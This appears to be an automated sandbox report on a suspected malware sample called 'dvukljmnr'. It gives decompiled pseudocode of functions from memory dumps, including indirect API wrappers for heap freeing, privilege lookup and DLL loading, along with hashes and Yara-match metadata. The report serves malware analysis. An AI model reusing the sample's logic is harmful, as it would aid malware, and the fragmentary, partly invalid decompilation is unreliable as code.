                                                          • Opcode ID: 7f5515119803eb490cb03bdf3602a3ddf7955d59e91516d308fb6d3bc6f22fa6
                                                          • Instruction ID: f5a133981db5de69143246aa9e779778ced1e27caef6fa814550706276b7310b
                                                          • Opcode Fuzzy Hash: 7f5515119803eb490cb03bdf3602a3ddf7955d59e91516d308fb6d3bc6f22fa6
                                                          • Instruction Fuzzy Hash: 97E06DB12142046FD714DF98DC44E9B3768AF48310F004549F90C5B242C630ED14CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 274 41a660-41a676 275 41a67c-41a691 RtlFreeHeap 274->275 276 41a677 call 41af50 274->276 276->275
                                                          C-Code - Quality: 100%
                                                          			E0041A660(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                          				char _t10;
                                                          				void* _t15;
                                                          
                                                          				_t3 = _a4 + 0xc74; // 0xc74
                                                          				E0041AF50(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                          				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                          				return _t10;
                                                          			}





                                                          0x0041a66f
                                                          0x0041a677
                                                          0x0041a68d
                                                          0x0041a691

                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_dvukljmnr.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                          • Instruction ID: bc8b067cd83da56cee666b5c28ce04d4f8bf1b8054c0557e0bc192b3240f86e0
                                                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                          • Instruction Fuzzy Hash: DAE012B1200208ABDB18EF99CC49EA777ACAF88764F018559BA1C5B242C630E9108AB4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0041A7C0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                          				int _t10;
                                                          				void* _t15;
                                                          
                                                          				E0041AF50(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                          				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                          				return _t10;
                                                          			}





                                                          0x0041a7da
                                                          0x0041a7f0
                                                          0x0041a7f4

                                                          APIs
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_dvukljmnr.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LookupPrivilegeValue
                                                          • String ID:
                                                          • API String ID: 3899507212-0
                                                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                          • Instruction ID: b271a6b6fd8fca1a6df64550df1cef4b538e167436523c48f1a9ef262b7a55b1
                                                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                          • Instruction Fuzzy Hash: 4FE01AB12002086BDB10DF49CC85EE737ADAF88654F018155BA0C57241C934E8118BF5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 60%
                                                          			E0040ACD3(void* __ebx, signed char _a8) {
                                                          				struct _EXCEPTION_RECORD _v8;
                                                          				struct _OBJDIR_INFORMATION _v12;
                                                          				char _v536;
                                                          				struct _OBJDIR_INFORMATION _t14;
                                                          				void* _t20;
                                                          				struct _OBJDIR_INFORMATION _t22;
                                                          				struct _EXCEPTION_RECORD _t28;
                                                          				void* _t31;
                                                          				void* _t34;
                                                          				void* _t38;
                                                          
                                                          				if(__ebx > __ebx) {
                                                          					L8:
                                                          					asm("cld");
                                                          					_t14 = E0041B490(_t28);
                                                          					_v12 = _t14;
                                                          					__eflags = _t14;
                                                          					if(_t14 == 0) {
                                                          						LdrLoadDll(0, 0,  &_v8,  &_v12); // executed
                                                          						_t14 = _v12;
                                                          					}
                                                          					return _t14;
                                                          				} else {
                                                          					asm("invalid");
                                                          					asm("enter 0x854a, 0xc5");
                                                          					_push(_t31);
                                                          					_t31 = _t34;
                                                          					_t26 = _a8;
                                                          					_v8 =  &_v536;
                                                          					_t20 = E0041CC40( &_v12, 0x104, _a8);
                                                          					_t38 = _t34 - 0x214 + 0xc;
                                                          					if(_t20 != 0) {
                                                          						_push(_v8);
                                                          						_t22 = E0041D060(_t26, __eflags);
                                                          						_t34 = _t38 + 4;
                                                          						__eflags = _t22;
                                                          						if(_t22 != 0) {
                                                          							E0041D2E0( &_v12, 0);
                                                          							_t34 = _t34 + 8;
                                                          						}
                                                          						_t28 = _v8;
                                                          						goto L8;
                                                          					} else {
                                                          						return _t20;
                                                          					}
                                                          				}
                                                          			}














                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_dvukljmnr.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: 2d0ef61cf7363694f2a5f9cc5c6e3f1be36ab1b03b27b5dd1b575d3d25a48400
                                                          • Instruction ID: 0100dda9211f4f49bdda9a44b065ce2ab9e5eac326fa31b3b38c2924a80330d7
                                                          • Opcode Fuzzy Hash: 2d0ef61cf7363694f2a5f9cc5c6e3f1be36ab1b03b27b5dd1b575d3d25a48400
                                                          • Instruction Fuzzy Hash: DCE04FB5E0010EAAEB00DAA4D841F9EB374EB48309F008195A91897640E634EA548B55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0041A6A0(intOrPtr _a4, int _a8) {
                                                          				void* _t10;
                                                          
                                                          				_t5 = _a4;
                                                          				E0041AF50(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                          				ExitProcess(_a8);
                                                          			}




                                                          0x0041a6a3
                                                          0x0041a6ba
                                                          0x0041a6c8

                                                          APIs
                                                          • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A6C8
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_dvukljmnr.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitProcess
                                                          • String ID:
                                                          • API String ID: 621844428-0
                                                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                          • Instruction ID: 02052f1feec4c32fa888e0c2ff15824475a9bddcc7bd9f2d7c69f560d23a1846
                                                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                          • Instruction Fuzzy Hash: CBD017726002187BD620EB99CC85FD777ACDF487A4F0180A9BA1C6B242C531BA108AE5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 90%
                                                          			E009A419C(signed int __eax, void* __ecx, void* __edx, void* __edi, signed int __esi) {
                                                          				void* __ebx;
                                                          				signed int _t183;
                                                          				intOrPtr* _t187;
                                                          				signed int _t268;
                                                          				void* _t269;
                                                          				void* _t272;
                                                          				void* _t274;
                                                          				signed int _t277;
                                                          				signed int _t278;
                                                          				signed int _t279;
                                                          				signed int _t280;
                                                          				signed int _t281;
                                                          				signed int _t282;
                                                          				signed int _t283;
                                                          				signed int _t284;
                                                          				signed int _t285;
                                                          				signed int _t286;
                                                          				signed int _t287;
                                                          				signed int _t288;
                                                          				signed int _t289;
                                                          				signed int _t290;
                                                          				signed int _t291;
                                                          				signed int _t292;
                                                          				signed int _t293;
                                                          				signed int _t294;
                                                          				signed int _t295;
                                                          				signed int _t296;
                                                          				signed int _t297;
                                                          				signed int _t298;
                                                          				signed int _t299;
                                                          				signed int _t304;
                                                          				signed int _t305;
                                                          				signed int _t306;
                                                          				signed int _t307;
                                                          				signed int _t308;
                                                          				signed int _t309;
                                                          				signed int _t310;
                                                          				signed int _t311;
                                                          				signed int _t312;
                                                          				signed int _t313;
                                                          				signed int _t314;
                                                          				signed int _t315;
                                                          				signed int _t316;
                                                          				signed int _t317;
                                                          				signed int _t318;
                                                          				signed int _t319;
                                                          				signed int _t320;
                                                          				signed int _t321;
                                                          				signed int _t322;
                                                          				signed int _t323;
                                                          				signed int _t324;
                                                          				signed int _t325;
                                                          				signed int _t326;
                                                          				signed int _t327;
                                                          				signed int _t328;
                                                          				signed int _t329;
                                                          				signed int _t330;
                                                          				void* _t332;
                                                          				void* _t334;
                                                          				void* _t340;
                                                          
                                                          				_t272 = __edx;
                                                          				 *((intOrPtr*)(_t332 - 0x17af07bb)) =  *((intOrPtr*)(_t332 - 0x17af07bb)) + __ecx;
                                                          				_t274 = __edi +  *((intOrPtr*)(__edx - 0x3b7c0001));
                                                          				_push(__eax);
                                                          				_t277 = __esi | __eax;
                                                          				_t278 = _t277 | E009B4CB1(_t269, _t274, _t277, _t332 - 8, 1, _t269, 0x41, _t274 + 0x8c);
                                                          				_t279 = _t278 | E009B4CB1(_t269, _t274, _t278, _t332 - 8, 1, _t269, 0x42, _t274 + 0x90);
                                                          				_t280 = _t279 | E009B4CB1(_t269, _t274, _t279, _t332 - 8, 1, _t269, 0x43, _t274 + 0x94);
                                                          				_t281 = _t280 | E009B4CB1(_t269, _t274, _t280, _t332 - 8, 1, _t269, 0x28, _t274 + 0x98);
                                                          				_t282 = _t281 | E009B4CB1(_t269, _t274, _t281, _t332 - 8, 1, _t269, 0x29, _t274 + 0x9c);
                                                          				_t283 = _t282 | E009B4CB1(_t269, _t274, _t282, _t332 - 8, 1, _t269, 0x1f, _t274 + 0xa0);
                                                          				_t284 = _t283 | E009B4CB1(_t269, _t274, _t283, _t332 - 8, 1, _t269, 0x20, _t274 + 0xa4);
                                                          				_t285 = _t284 | E009B4CB1(_t269, _t274, _t284, _t332 - 8, 1, _t269, 0x1003, _t274 + 0xa8);
                                                          				_t286 = _t285 | E009B4CB1(_t269, _t274, _t285, _t332 - 8, 0, _t269, 0x1009, _t274 + 0xac);
                                                          				_t287 = _t286 | E009B4CB1(_t269, _t274, _t286, _t332 - 8, 2, _t269, 0x31, _t274 + 0xb8);
                                                          				_t288 = _t287 | E009B4CB1(_t269, _t274, _t287, _t332 - 8, 2, _t269, 0x32, _t274 + 0xbc);
                                                          				_t289 = _t288 | E009B4CB1(_t269, _t274, _t288, _t332 - 8, 2, _t269, 0x33, _t274 + 0xc0);
                                                          				_t290 = _t289 | E009B4CB1(_t269, _t274, _t289, _t332 - 8, 2, _t269, 0x34, _t274 + 0xc4);
                                                          				_t291 = _t290 | E009B4CB1(_t269, _t274, _t290, _t332 - 8, 2, _t269, 0x35, _t274 + 0xc8);
                                                          				_t292 = _t291 | E009B4CB1(_t269, _t274, _t291, _t332 - 8, 2, _t269, 0x36, _t274 + 0xcc);
                                                          				_t293 = _t292 | E009B4CB1(_t269, _t274, _t292, _t332 - 8, 2, _t269, 0x37, _t274 + 0xb4);
                                                          				_t294 = _t293 | E009B4CB1(_t269, _t274, _t293, _t332 - 8, 2, _t269, 0x2a, _t274 + 0xd4);
                                                          				_t295 = _t294 | E009B4CB1(_t269, _t274, _t294, _t332 - 8, 2, _t269, 0x2b, _t274 + 0xd8);
                                                          				_t296 = _t295 | E009B4CB1(_t269, _t274, _t295, _t332 - 8, 2, _t269, 0x2c, _t274 + 0xdc);
                                                          				_t297 = _t296 | E009B4CB1(_t269, _t274, _t296, _t332 - 8, 2, _t269, 0x2d, _t274 + 0xe0);
                                                          				_t298 = _t297 | E009B4CB1(_t269, _t274, _t297, _t332 - 8, 2, _t269, 0x2e, _t274 + 0xe4);
                                                          				_t299 = _t298 | E009B4CB1(_t269, _t274, _t298, _t332 - 8, 2, _t269, 0x2f, _t274 + 0xe8);
                                                          				_t300 = _t299 | E009B4CB1(_t269, _t274, _t299, _t332 - 8, 2, _t269, 0x30, _t274 + 0xd0);
                                                          				_t183 = E009B4CB1(_t269, _t274, _t299 | E009B4CB1(_t269, _t274, _t299, _t332 - 8, 2, _t269, 0x30, _t274 + 0xd0), _t332 - 8, 2, _t269, 0x44, _t274 + 0xec);
                                                          				_t340 = _t334 + 0x1e0;
                                                          				E009B4CB1(_t269, _t274, _t300 | _t183, _t332 - 8, 2, _t269, 0x45, _t274 + 0xf0);
                                                          				_t187 = _t274 + 0xf4;
                                                          				 *_t187 =  *_t187 + _t187;
                                                          				 *((intOrPtr*)(_t187 + 0x6a)) =  *((intOrPtr*)(_t187 + 0x6a)) + _t272;
                                                          				_t304 = _t340 + 1;
                                                          				_push(_t269);
                                                          				_push(2);
                                                          				_push(_t332 - 8);
                                                          				_t305 = _t304 | E009B4CB1(_t269, _t274, _t304);
                                                          				_t306 = _t305 | E009B4CB1(_t269, _t274, _t305, _t332 - 8, 2, _t269, 0x47, _t274 + 0xf8);
                                                          				_t307 = _t306 | E009B4CB1(_t269, _t274, _t306, _t332 - 8, 2, _t269, 0x48, _t274 + 0xfc);
                                                          				_t308 = _t307 | E009B4CB1(_t269, _t274, _t307, _t332 - 8, 2, _t269, 0x49, _t274 + 0x100);
                                                          				_t309 = _t308 | E009B4CB1(_t269, _t274, _t308, _t332 - 8, 2, _t269, 0x4a, _t274 + 0x104);
                                                          				_t310 = _t309 | E009B4CB1(_t269, _t274, _t309, _t332 - 8, 2, _t269, 0x4b, _t274 + 0x108);
                                                          				_t311 = _t310 | E009B4CB1(_t269, _t274, _t310, _t332 - 8, 2, _t269, 0x4c, _t274 + 0x10c);
                                                          				_t312 = _t311 | E009B4CB1(_t269, _t274, _t311, _t332 - 8, 2, _t269, 0x4d, _t274 + 0x110);
                                                          				_t313 = _t312 | E009B4CB1(_t269, _t274, _t312, _t332 - 8, 2, _t269, 0x4e, _t274 + 0x114);
                                                          				_t314 = _t313 | E009B4CB1(_t269, _t274, _t313, _t332 - 8, 2, _t269, 0x4f, _t274 + 0x118);
                                                          				_t315 = _t314 | E009B4CB1(_t269, _t274, _t314, _t332 - 8, 2, _t269, 0x38, _t274 + 0x11c);
                                                          				_t316 = _t315 | E009B4CB1(_t269, _t274, _t315, _t332 - 8, 2, _t269, 0x39, _t274 + 0x120);
                                                          				_t317 = _t316 | E009B4CB1(_t269, _t274, _t316, _t332 - 8, 2, _t269, 0x3a, _t274 + 0x124);
                                                          				_t318 = _t317 | E009B4CB1(_t269, _t274, _t317, _t332 - 8, 2, _t269, 0x3b, _t274 + 0x128);
                                                          				_t319 = _t318 | E009B4CB1(_t269, _t274, _t318, _t332 - 8, 2, _t269, 0x3c, _t274 + 0x12c);
                                                          				_t320 = _t319 | E009B4CB1(_t269, _t274, _t319, _t332 - 8, 2, _t269, 0x3d, _t274 + 0x130);
                                                          				_t321 = _t320 | E009B4CB1(_t269, _t274, _t320, _t332 - 8, 2, _t269, 0x3e, _t274 + 0x134);
                                                          				_t322 = _t321 | E009B4CB1(_t269, _t274, _t321, _t332 - 8, 2, _t269, 0x3f, _t274 + 0x138);
                                                          				_t323 = _t322 | E009B4CB1(_t269, _t274, _t322, _t332 - 8, 2, _t269, 0x40, _t274 + 0x13c);
                                                          				_t324 = _t323 | E009B4CB1(_t269, _t274, _t323, _t332 - 8, 2, _t269, 0x41, _t274 + 0x140);
                                                          				_t325 = _t324 | E009B4CB1(_t269, _t274, _t324, _t332 - 8, 2, _t269, 0x42, _t274 + 0x144);
                                                          				_t326 = _t325 | E009B4CB1(_t269, _t274, _t325, _t332 - 8, 2, _t269, 0x43, _t274 + 0x148);
                                                          				_t327 = _t326 | E009B4CB1(_t269, _t274, _t326, _t332 - 8, 2, _t269, 0x28, _t274 + 0x14c);
                                                          				_t328 = _t327 | E009B4CB1(_t269, _t274, _t327, _t332 - 8, 2, _t269, 0x29, _t274 + 0x150);
                                                          				_t329 = _t328 | E009B4CB1(_t269, _t274, _t328, _t332 - 8, 2, _t269, 0x1f, _t274 + 0x154);
                                                          				_t330 = _t329 | E009B4CB1(_t269, _t274, _t329, _t332 - 8, 2, _t269, 0x20, _t274 + 0x158);
                                                          				_t268 = E009B4CB1(_t269, _t274, _t330, _t332 - 8, 2, _t269, 0x1003, _t274 + 0x15c) | _t330;
                                                          				return _t268;
                                                          			}
































































                                                          APIs
                                                          • ___getlocaleinfo.LIBCMT ref: 009B92C3
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D03
                                                            • Part of subcall function 009B4CB1: GetLastError.KERNEL32 ref: 009B4D15
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D35
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4D4A
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D77
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4D8C
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4DA4
                                                          • ___getlocaleinfo.LIBCMT ref: 009B92DA
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4DE4
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4E0E
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4E34
                                                            • Part of subcall function 009B4CB1: __invoke_watson.LIBCMT ref: 009B4E84
                                                          • ___getlocaleinfo.LIBCMT ref: 009B92F1
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9308
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9322
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9339
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9350
                                                          • ___getlocaleinfo.LIBCMT ref: 009B936A
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9387
                                                          • ___getlocaleinfo.LIBCMT ref: 009B939E
                                                          • ___getlocaleinfo.LIBCMT ref: 009B93B5
                                                          • ___getlocaleinfo.LIBCMT ref: 009B93CC
                                                          • ___getlocaleinfo.LIBCMT ref: 009B93E6
                                                          • ___getlocaleinfo.LIBCMT ref: 009B93FD
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9414
                                                          • ___getlocaleinfo.LIBCMT ref: 009B942B
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9445
                                                          • ___getlocaleinfo.LIBCMT ref: 009B945C
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9473
                                                          • ___getlocaleinfo.LIBCMT ref: 009B948A
                                                          • ___getlocaleinfo.LIBCMT ref: 009B94A4
                                                          • ___getlocaleinfo.LIBCMT ref: 009B94BB
                                                          • ___getlocaleinfo.LIBCMT ref: 009B94D2
                                                          • ___getlocaleinfo.LIBCMT ref: 009B94E9
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9503
                                                          • ___getlocaleinfo.LIBCMT ref: 009B951A
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9531
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9548
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9562
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9579
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9590
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95A7
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95C1
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95D8
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95EF
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9606
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9620
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9637
                                                          • ___getlocaleinfo.LIBCMT ref: 009B964E
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9665
                                                          • ___getlocaleinfo.LIBCMT ref: 009B967F
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9696
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96AD
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96C4
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96DE
                                                          • ___getlocaleinfo.LIBCMT ref: 009B96F5
                                                          • ___getlocaleinfo.LIBCMT ref: 009B970C
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9723
                                                          • ___getlocaleinfo.LIBCMT ref: 009B973D
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9754
                                                          • ___getlocaleinfo.LIBCMT ref: 009B976B
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9785
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: ___getlocaleinfo$InfoLocale___crt__calloc_crt_free$ErrorLast__invoke_watson
                                                          • String ID:
                                                          • API String ID: 2187842456-0
                                                          • Opcode ID: 8375b925f5075488876cc9cab56261634bb77b2d62e2c670fe3a5a182e7b013c
                                                          • Instruction ID: 6e8214fe5e7f4c6d73932429b3962ef00e9e2aa88c85c0fbdba6f399621dcba6
                                                          • Opcode Fuzzy Hash: 8375b925f5075488876cc9cab56261634bb77b2d62e2c670fe3a5a182e7b013c
                                                          • Instruction Fuzzy Hash: 71F1D9B7E4120D7AE72697F0CD86FEBB7ACA704B40F004622F755E7082FAB4665457A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 86%
                                                          			E009A2B81(intOrPtr* __eax, void* __edx, void* __edi, void* __esi) {
                                                          				void* __ebx;
                                                          				signed int _t138;
                                                          				void* _t139;
                                                          				signed int _t146;
                                                          				signed int _t147;
                                                          				signed int _t148;
                                                          				signed int _t149;
                                                          				signed int _t150;
                                                          				signed int _t151;
                                                          				signed int _t152;
                                                          				signed int _t153;
                                                          				signed int _t154;
                                                          				signed int _t155;
                                                          				signed int _t156;
                                                          				signed int _t157;
                                                          				signed int _t158;
                                                          				signed int _t159;
                                                          				signed int _t160;
                                                          				signed int _t161;
                                                          				signed int _t162;
                                                          				signed int _t163;
                                                          				signed int _t164;
                                                          				signed int _t165;
                                                          				signed int _t166;
                                                          				signed int _t167;
                                                          				signed int _t168;
                                                          				signed int _t169;
                                                          				signed int _t170;
                                                          				signed int _t171;
                                                          				signed int _t172;
                                                          				void* _t174;
                                                          				void* _t176;
                                                          
                                                          				 *__eax =  *__eax + __eax;
                                                          				 *((intOrPtr*)(__eax + 0x6a)) =  *((intOrPtr*)(__eax + 0x6a)) + __edx;
                                                          				_t146 = _t176 + 1;
                                                          				_push(_t139);
                                                          				_push(2);
                                                          				_push(_t174 - 8);
                                                          				_t147 = _t146 | E009B4CB1(_t139, __edi, _t146);
                                                          				_t148 = _t147 | E009B4CB1(_t139, __edi, _t147, _t174 - 8, 2, _t139, 0x47, __edi + 0xf8);
                                                          				_t149 = _t148 | E009B4CB1(_t139, __edi, _t148, _t174 - 8, 2, _t139, 0x48, __edi + 0xfc);
                                                          				_t150 = _t149 | E009B4CB1(_t139, __edi, _t149, _t174 - 8, 2, _t139, 0x49, __edi + 0x100);
                                                          				_t151 = _t150 | E009B4CB1(_t139, __edi, _t150, _t174 - 8, 2, _t139, 0x4a, __edi + 0x104);
                                                          				_t152 = _t151 | E009B4CB1(_t139, __edi, _t151, _t174 - 8, 2, _t139, 0x4b, __edi + 0x108);
                                                          				_t153 = _t152 | E009B4CB1(_t139, __edi, _t152, _t174 - 8, 2, _t139, 0x4c, __edi + 0x10c);
                                                          				_t154 = _t153 | E009B4CB1(_t139, __edi, _t153, _t174 - 8, 2, _t139, 0x4d, __edi + 0x110);
                                                          				_t155 = _t154 | E009B4CB1(_t139, __edi, _t154, _t174 - 8, 2, _t139, 0x4e, __edi + 0x114);
                                                          				_t156 = _t155 | E009B4CB1(_t139, __edi, _t155, _t174 - 8, 2, _t139, 0x4f, __edi + 0x118);
                                                          				_t157 = _t156 | E009B4CB1(_t139, __edi, _t156, _t174 - 8, 2, _t139, 0x38, __edi + 0x11c);
                                                          				_t158 = _t157 | E009B4CB1(_t139, __edi, _t157, _t174 - 8, 2, _t139, 0x39, __edi + 0x120);
                                                          				_t159 = _t158 | E009B4CB1(_t139, __edi, _t158, _t174 - 8, 2, _t139, 0x3a, __edi + 0x124);
                                                          				_t160 = _t159 | E009B4CB1(_t139, __edi, _t159, _t174 - 8, 2, _t139, 0x3b, __edi + 0x128);
                                                          				_t161 = _t160 | E009B4CB1(_t139, __edi, _t160, _t174 - 8, 2, _t139, 0x3c, __edi + 0x12c);
                                                          				_t162 = _t161 | E009B4CB1(_t139, __edi, _t161, _t174 - 8, 2, _t139, 0x3d, __edi + 0x130);
                                                          				_t163 = _t162 | E009B4CB1(_t139, __edi, _t162, _t174 - 8, 2, _t139, 0x3e, __edi + 0x134);
                                                          				_t164 = _t163 | E009B4CB1(_t139, __edi, _t163, _t174 - 8, 2, _t139, 0x3f, __edi + 0x138);
                                                          				_t165 = _t164 | E009B4CB1(_t139, __edi, _t164, _t174 - 8, 2, _t139, 0x40, __edi + 0x13c);
                                                          				_t166 = _t165 | E009B4CB1(_t139, __edi, _t165, _t174 - 8, 2, _t139, 0x41, __edi + 0x140);
                                                          				_t167 = _t166 | E009B4CB1(_t139, __edi, _t166, _t174 - 8, 2, _t139, 0x42, __edi + 0x144);
                                                          				_t168 = _t167 | E009B4CB1(_t139, __edi, _t167, _t174 - 8, 2, _t139, 0x43, __edi + 0x148);
                                                          				_t169 = _t168 | E009B4CB1(_t139, __edi, _t168, _t174 - 8, 2, _t139, 0x28, __edi + 0x14c);
                                                          				_t170 = _t169 | E009B4CB1(_t139, __edi, _t169, _t174 - 8, 2, _t139, 0x29, __edi + 0x150);
                                                          				_t171 = _t170 | E009B4CB1(_t139, __edi, _t170, _t174 - 8, 2, _t139, 0x1f, __edi + 0x154);
                                                          				_t172 = _t171 | E009B4CB1(_t139, __edi, _t171, _t174 - 8, 2, _t139, 0x20, __edi + 0x158);
                                                          				_t138 = E009B4CB1(_t139, __edi, _t172, _t174 - 8, 2, _t139, 0x1003, __edi + 0x15c) | _t172;
                                                          				return _t138;
                                                          			}




































                                                          APIs
                                                          • ___getlocaleinfo.LIBCMT ref: 009B951A
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D03
                                                            • Part of subcall function 009B4CB1: GetLastError.KERNEL32 ref: 009B4D15
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D35
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4D4A
                                                            • Part of subcall function 009B4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 009B4D77
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4D8C
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4DA4
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9531
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4DE4
                                                            • Part of subcall function 009B4CB1: __calloc_crt.LIBCMT ref: 009B4E0E
                                                            • Part of subcall function 009B4CB1: _free.LIBCMT ref: 009B4E34
                                                            • Part of subcall function 009B4CB1: __invoke_watson.LIBCMT ref: 009B4E84
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9548
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9562
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9579
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9590
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95A7
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95C1
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95D8
                                                          • ___getlocaleinfo.LIBCMT ref: 009B95EF
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9606
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9620
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9637
                                                          • ___getlocaleinfo.LIBCMT ref: 009B964E
                                                          • ___getlocaleinfo.LIBCMT ref: 009B9665
